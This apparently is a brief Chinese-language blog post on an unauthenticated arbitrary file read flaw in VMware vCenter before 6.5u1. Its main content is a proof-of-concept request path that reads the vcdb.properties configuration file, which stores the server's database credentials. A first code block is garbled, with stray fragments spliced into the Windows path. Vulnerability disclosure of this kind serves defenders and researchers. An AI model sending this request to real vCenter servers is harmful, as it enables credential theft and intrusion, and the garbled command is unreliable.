# VMware vCenter 未经身份验证任意文件读取漏洞 < 6.5u1 VMware vCenter 未经身份验证任意文件读取漏洞 < 6.5u1, VMware透露此漏洞已在6.5u1中修复,但未分配CVE。 ```bash $user/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\http://vcdb.properties ```  PoC ``` /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties ```
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容